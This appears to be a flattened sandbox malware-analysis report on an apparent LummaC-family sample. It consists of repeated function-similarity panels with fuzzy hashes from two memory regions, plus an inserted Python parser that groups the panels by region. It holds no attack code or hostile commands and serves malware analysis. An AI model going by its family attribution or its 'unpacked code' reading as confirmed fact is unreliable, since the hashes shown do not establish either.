                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 9YB
                                                                                                                                                                                                                                                                • API String ID: 0-659603884
                                                                                                                                                                                                                                                                • Opcode ID: cc1449e27a0f5531b09e40fa76c2dd5bb8592e6f2d5bdd274fc9f48ccbd80c23
                                                                                                                                                                                                                                                                • Instruction ID: 1cfe0ac6ad2819008f92b10fbbf01a1b5c50993105dc128c753fe97305f097ae
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cc1449e27a0f5531b09e40fa76c2dd5bb8592e6f2d5bdd274fc9f48ccbd80c23
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80B1077AA00215CBDB18CFA9D8916BFB7B2FF89310F58816DD442AB355DB395C42CB84
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: .
                                                                                                                                                                                                                                                                • API String ID: 0-248832578
                                                                                                                                                                                                                                                                • Opcode ID: 2ac21a3dbd00c1a7cfa2cfa9c8571f5cf891ae991bce99d29bc9653d85f38a4a
                                                                                                                                                                                                                                                                • Instruction ID: 2823e07fbbb50db066b2c442ced4ae8f01fbddd957871d70742adaa2677f6ced
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2ac21a3dbd00c1a7cfa2cfa9c8571f5cf891ae991bce99d29bc9653d85f38a4a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FE912A71E082524BC721CE29CA8025BB7E5AB81350F198A7ED8D5E73D1EA39DD414BC5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
Yara matches
Similarity
• API ID:
• String ID: .
• API String ID: 0-248832578
Strings
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID:
• String ID: 0
• API String ID: 0-4108050209
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
Yara matches
Similarity
• API ID:
• String ID: 0
• API String ID: 0-4108050209
Strings
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID:
• String ID: ,
• API String ID: 0-3772416878
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
Yara matches
Similarity
• API ID:
• String ID: ,
• API String ID: 0-3772416878
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
Yara matches
Similarity
• API ID:
• String ID: gfff
• API String ID: 0-1553575800
Strings
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID:
• String ID: "
• API String ID: 0-123907689
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
Yara matches
Similarity
• API ID:
• String ID: "
• API String ID: 0-123907689
                                                                                                                                                                                                                                                                • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                • Instruction ID: 3ef6b53bf409fe926cc96efc671e44980e7f577e40d15e86c5113424e530d77a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E710232A4C3158BD724CE29C88032EB7E2ABD5718F1AC53DE4A59B391D335DE45C782
Strings
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID:
• String ID: klm
• API String ID: 0-3800403225
• Opcode ID: d5319d95fe68aebd98aaca92b9825a3df1dae6eff9af15c4fe87a1423c5b3b77
• Instruction ID: fbab8d391cb70804594fb2969dbf4b57704b04da195ac2ac4d1ccbe35a174314
• Opcode Fuzzy Hash: d5319d95fe68aebd98aaca92b9825a3df1dae6eff9af15c4fe87a1423c5b3b77
• Instruction Fuzzy Hash: 9751F3B4A0D3508BD314EF25D81276BB7F2EFA6348F18856EE4D54B391E7398501CB1A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
Yara matches
Similarity
• API ID:
• String ID: klm
• API String ID: 0-3800403225
• Opcode ID: 22a1d23ffb192b13ce7e4b67b3c031d181d26310d43a75b7846801cd596ae7fb
• Instruction ID: 6b46143c41f910dd1bcd3a8d1c23466659094f44d08f2d726315dfe3c29bd2e0
• Opcode Fuzzy Hash: 22a1d23ffb192b13ce7e4b67b3c031d181d26310d43a75b7846801cd596ae7fb
• Instruction Fuzzy Hash: DB5122B464C3508BD724DF64C49276BB7F2FFA6308F18896CE4D68B290E7358501CB1A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID:
• String ID: pF
• API String ID: 0-4112324664
• Opcode ID: fe2049b3d9abf6bd8e08d2fec2b5cc8118d281e5b2e668e1a48ceb0649ab8eab
• Instruction ID: 4b15e4364feff8b1cae5d4f97873799dd65533a9f2e3c3f3723fc524ea0f092f
• Opcode Fuzzy Hash: fe2049b3d9abf6bd8e08d2fec2b5cc8118d281e5b2e668e1a48ceb0649ab8eab
• Instruction Fuzzy Hash: 6651C572E442698BDB28CF68D8513DEB7B2FB84304F1581BEC55AEB384CB3449468F81
Strings
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID: InitializeThunk
• String ID: ?^A
• API String ID: 2994545307-4120214115
• Opcode ID: 2c308a6fbd29e83612078340da99c3c212b60cd104204cd4e1c6453a1b582895
• Instruction ID: 9ee6d34e9011fc7addbd5ae762574014bc539ca284b22a695acd6cfcc742d02e
• Opcode Fuzzy Hash: 2c308a6fbd29e83612078340da99c3c212b60cd104204cd4e1c6453a1b582895
• Instruction Fuzzy Hash: 2141783A648300DFE3248B94D880ABBBBA3B7D5310F5D552EC5C527222CB745C81878F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID:
• String ID: 6B
• API String ID: 0-4127139157
• Opcode ID: e4ae7821e595edd76aaa032931955796ee87cd6bb1a1de6a8bf0ae27a5d1bb00
• Instruction ID: 96ac195b9b02395a12e3507be26d084a31814086cf7b4e33e8fc611c97ddc8d1
• Opcode Fuzzy Hash: e4ae7821e595edd76aaa032931955796ee87cd6bb1a1de6a8bf0ae27a5d1bb00
• Instruction Fuzzy Hash: 90416A79A05102CFE708CF68EC917A9B3B2FF8A311F5A45B8D545E7390CB74A951CB48
Strings
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID:
• String ID: $%
• API String ID: 0-4214564638
• Opcode ID: d78bc3d5ce02b10deb2a392cf77ba543051be3d806e39ea4f7dd24e4e80accd5
• Instruction ID: 3a12058a654eb28ab9a6ec9325260f0da8ac6e7581b620ea067b04d8af41a39e
• Opcode Fuzzy Hash: d78bc3d5ce02b10deb2a392cf77ba543051be3d806e39ea4f7dd24e4e80accd5
• Instruction Fuzzy Hash: 694124B0E022298BCB10CF99E8513AEB7B1FF55310F09825DE441AB790E7785941CB64
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
Yara matches
Similarity
• API ID:
• String ID: ,+*)
• API String ID: 0-3529585375
• Opcode ID: d0860ee87a3522d35f46aac91f37c79de7283bf131867904a39b4a27e1383bdc
• Instruction ID: 4a1db1ce9492377590abd6cd5da5bd6f3bc1a10ed1d4dc6ac798132f01b0782c
• Opcode Fuzzy Hash: d0860ee87a3522d35f46aac91f37c79de7283bf131867904a39b4a27e1383bdc
• Instruction Fuzzy Hash: E931A539B402219FEB18CF58CC91BBEB3B2BB89304F255129E542A7390CB75AD05C794
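The Similarity panels above are flattened HTML, one per recovered function, and the signal worth pulling out of them is which memory region each function came from: the mapped image at 0x00400000 (based on PE: true) versus the region at 0x020F0000, which is not a PE mapping and carries Yara matches, consistent with code that was unpacked at runtime. The parser below is an added example written for this page; it is not part of the Joe Sandbox report or its tooling. It takes two panels copied verbatim from the report text (constructed sample input), turns each into a dictionary, strips the "Download File" link residue from the Associated line, and groups Instruction Fuzzy Hashes by region so they can be compared across reports. The function names and the regular expressions describing the panel layout are assumptions about the text as it appears here, not a documented Joe Sandbox schema.

```python
import re
from collections import defaultdict

# Constructed sample input: two Similarity panels copied from the report text
# above, one from the mapped image (0x00400000) and one from the 0x020F0000 region.
SAMPLE = """\
Strings
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID: InitializeThunk
• String ID: ?^A
• API String ID: 2994545307-4120214115
• Opcode ID: 2c308a6fbd29e83612078340da99c3c212b60cd104204cd4e1c6453a1b582895
• Instruction ID: 9ee6d34e9011fc7addbd5ae762574014bc539ca284b22a695acd6cfcc742d02e
• Opcode Fuzzy Hash: 2c308a6fbd29e83612078340da99c3c212b60cd104204cd4e1c6453a1b582895
• Instruction Fuzzy Hash: 2141783A648300DFE3248B94D880ABBBBA3B7D5310F5D552EC5C527222CB745C81878F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
Yara matches
Similarity
• API ID:
• String ID: klm
• API String ID: 0-3800403225
• Opcode ID: 22a1d23ffb192b13ce7e4b67b3c031d181d26310d43a75b7846801cd596ae7fb
• Instruction ID: 6b46143c41f910dd1bcd3a8d1c23466659094f44d08f2d726315dfe3c29bd2e0
• Opcode Fuzzy Hash: 22a1d23ffb192b13ce7e4b67b3c031d181d26310d43a75b7846801cd596ae7fb
• Instruction Fuzzy Hash: DB5122B464C3508BD724DF64C49276BB7F2FFA6308F18896CE4D68B290E7358501CB1A
"""

# Layout assumptions (hypothetical, derived from the text on this page):
# a bullet line is "• Key: value"; a Source File value carries the dump name,
# the region base and the "based on PE" flag.
FIELD = re.compile(r"^•\s*([^:]+):\s*(.*)$")
SOURCE = re.compile(
    r"^(?P<dump>\S+\.sdmp), Offset: (?P<offset>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$"
)
LINK_RESIDUE = "Download File"


def parse_panels(text):
    """Split the flattened report text into one dict per 'Strings' panel."""
    panels, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Strings":              # every function panel starts with this label
            cur = {"yara": False}
            panels.append(cur)
            continue
        if cur is None or not line:
            continue
        if line == "Yara matches":         # label only appears on panels with a rule hit
            cur["yara"] = True
            continue
        m = FIELD.match(line)
        if not m:
            continue                       # other section labels, e.g. 'Similarity'
        key, val = m.group(1).strip(), m.group(2).strip()
        if key == "Associated" and val.endswith(LINK_RESIDUE):
            val = val[: -len(LINK_RESIDUE)]   # drop the download-link widget text
        if key == "Source File":
            s = SOURCE.match(val)
            if s:
                cur["dump"] = s["dump"]
                cur["region"] = int(s["offset"], 16)
                cur["based_on_pe"] = s["pe"] == "true"
        cur[key] = val
    return panels


def group_by_region(panels):
    """Map region base address -> Instruction Fuzzy Hashes recovered from it."""
    out = defaultdict(list)
    for p in panels:
        out[p["region"]].append(p["Instruction Fuzzy Hash"])
    return dict(out)


def unpacked_candidates(panels):
    """Panels from a dump that is not a PE mapping but has Yara hits: likely unpacked code."""
    return [p for p in panels if not p["based_on_pe"] and p["yara"]]


if __name__ == "__main__":
    ps = parse_panels(SAMPLE)
    for base, hashes in group_by_region(ps).items():
        print(f"{base:#010x}: {len(hashes)} function(s)")
    for p in unpacked_candidates(ps):
        print("non-PE region with Yara hit:", p["Snapshot File"], p["Instruction ID"][:16])
```

Run over the whole report text, `group_by_region` gives one fuzzy-hash list per dump, and the 0x020F0000 list is the one to compare against other LummaC reports, since the mapped image at 0x00400000 is the packer layer that changes between builds.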
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
Yara matches
Similarity
• API ID:
• String ID: o`
                                                                                                                                                                                                                                                                • API String ID: 0-3993896143
                                                                                                                                                                                                                                                                • Opcode ID: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
                                                                                                                                                                                                                                                                • Instruction ID: 118aa5b12d21677fc97a57f068ad92775cc848755faed7f2498fefef8e3ccd89
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D112570208380AFC300CF65CCC1B2EBFE29BC6204F64983DE18097251C635E849DB05
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 7c893c65e03af5ed3381c551886126d2ea28dea69d32e62726fdedb8c1a906dc
                                                                                                                                                                                                                                                                • Instruction ID: 1dcbf6391fd41f0c0a817e27e8bafbe762063cd3c7318eef4161125519cd5594
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c893c65e03af5ed3381c551886126d2ea28dea69d32e62726fdedb8c1a906dc
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 57424876A083518BD724CF29C8917ABB7E2EFC5310F19892EE4C597351DB38D845CB8A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 42edef53a1db2b3de2c06a60c4f32876a63e42617b2c0b108f141745477d7c97
                                                                                                                                                                                                                                                                • Instruction ID: 46ead43bd988ad5b99a16a21c2ab1060e4939541d0428d2c05e05470f57672f5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 42edef53a1db2b3de2c06a60c4f32876a63e42617b2c0b108f141745477d7c97
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C52E1715083458FCB14CF18C0806AABFE1FF89305F18897EE8996B391D778E949CB89
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 23751e459ccc9bb6a4f1f3a1e8208e8d277617bd75432395b0e424f8c0ad6651
                                                                                                                                                                                                                                                                • Instruction ID: 42a8754500a030df467a19eb208a6b75f213c456a02a9d9f5179d7aa03d033db
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 23751e459ccc9bb6a4f1f3a1e8208e8d277617bd75432395b0e424f8c0ad6651
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B952E3B0A08B949FE730CB24C4843A7BBE1AB91314F15483FD5D756BC2C27DB9958B0A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: dbc0620a8ce2ba57e9d910984acef19c89c6c78f1b9d7e948e49654559093e9b
                                                                                                                                                                                                                                                                • Instruction ID: eb48c5ca5b91bc866485e22408b89da6085668d8ee5cea467de012e956044444
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dbc0620a8ce2ba57e9d910984acef19c89c6c78f1b9d7e948e49654559093e9b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7552D5B0948B849FE7F2CB34C4843A7FBE1AF41314F14482ED6E606E82D37AA585D746
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 83213a2729f592a7edcd98fc7886bfd8d55118cdf426f5e19ae94b324be42bba
                                                                                                                                                                                                                                                                • Instruction ID: 7b72874d185f9504f09fa30b763c2e13130ca022e31a023e0d3144396e745bed
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83213a2729f592a7edcd98fc7886bfd8d55118cdf426f5e19ae94b324be42bba
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1012A372A0C7118BD725DE18D8806ABB3E1BFC4315F19893ED986A7385D738B8518B87
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 83213a2729f592a7edcd98fc7886bfd8d55118cdf426f5e19ae94b324be42bba
                                                                                                                                                                                                                                                                • Instruction ID: 8f5feaac63c516f55d88ecf92d7b9c8819cecb9d6a9a936b8c88efb88f154065
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83213a2729f592a7edcd98fc7886bfd8d55118cdf426f5e19ae94b324be42bba
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E512E7326487118BC7A5DF18D8806BBF3E1FFC8319F19892DDA8687691D734A811DB87
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c09ab01705470a57d5ac0deba44fab8d122be945ed84d36d91023274058ae07e
• Instruction ID: 819cfa75d40707277b7651a3d059055683ccfe715dfab14305db8651ec0ec7a0
• Opcode Fuzzy Hash: c09ab01705470a57d5ac0deba44fab8d122be945ed84d36d91023274058ae07e
• Instruction Fuzzy Hash: 8C32E6B5A04B408FD714DF38C5953AABBE1AF45310F188A3ED5EB873D2E638A445CB06
Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a7ebcab429d69887af0994e9597e2f97a4cbfb516015e6b5ad3962d1502a690c
• Instruction ID: a68de0d77ab4205fd7d5f5b3604ad8f0da2c32d526df4591e22304a32d34ad66
• Opcode Fuzzy Hash: a7ebcab429d69887af0994e9597e2f97a4cbfb516015e6b5ad3962d1502a690c
• Instruction Fuzzy Hash: DE32B371A44B408FD714DF38C8953AABBE2AF49310F09896DD9EB877C1E779A505CB02
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5aa5d3a12128a26ed9c4319b3588af040b5452ee3ad61b5c13934a671167d9a8
• Instruction ID: 1c03f4d1d9da4e588b7eb0090f71902aa376377d07fc1d7850242e2290c7d787
• Opcode Fuzzy Hash: 5aa5d3a12128a26ed9c4319b3588af040b5452ee3ad61b5c13934a671167d9a8
• Instruction Fuzzy Hash: 02322470914B118FC328CF29C68052ABBF5BF85711B604A2ED697A7F90D73AF945CB18
Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d327358085ba1a993c9adccc0f3e0ff780f208ec349b024e73061d52e6553d9c
• Instruction ID: c7f1ab83ed411f23ae9bc268ca9359f6fd541b41528aa78cea5f31be27cf2ffe
• Opcode Fuzzy Hash: d327358085ba1a993c9adccc0f3e0ff780f208ec349b024e73061d52e6553d9c
• Instruction Fuzzy Hash: 953223B0554B518FC3B9CF29C58066ABBF1BF85610B904A2EDAA787F90D736F484DB10
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7d4a608daa09243b0b1664d6ac314f1ff4fa7c4c8c111b79aec593db6438873e
• Instruction ID: ba4386b7c12eba82c1b0c1a845e92ae21c1426ac82d7aa641ba094e7d1c8bfda
• Opcode Fuzzy Hash: 7d4a608daa09243b0b1664d6ac314f1ff4fa7c4c8c111b79aec593db6438873e
• Instruction Fuzzy Hash: FE021671A083128BC724CF28C4A16ABB7F1EFE5350F19852DE8C99B351E7389D85C786
Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7d4a608daa09243b0b1664d6ac314f1ff4fa7c4c8c111b79aec593db6438873e
• Instruction ID: afee58d3787993cd022041dbf3e41a706c9f5a82427ae5e2fb567493bed381dc
• Opcode Fuzzy Hash: 7d4a608daa09243b0b1664d6ac314f1ff4fa7c4c8c111b79aec593db6438873e
• Instruction Fuzzy Hash: 48023671A483128BC724CF28C8D16ABB7F1EFD4714F19892CE8C99B391E7789941C786
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2253fead0949c94e28b23ae243de764efe372f7ce01ce19a162629ea64ece33e
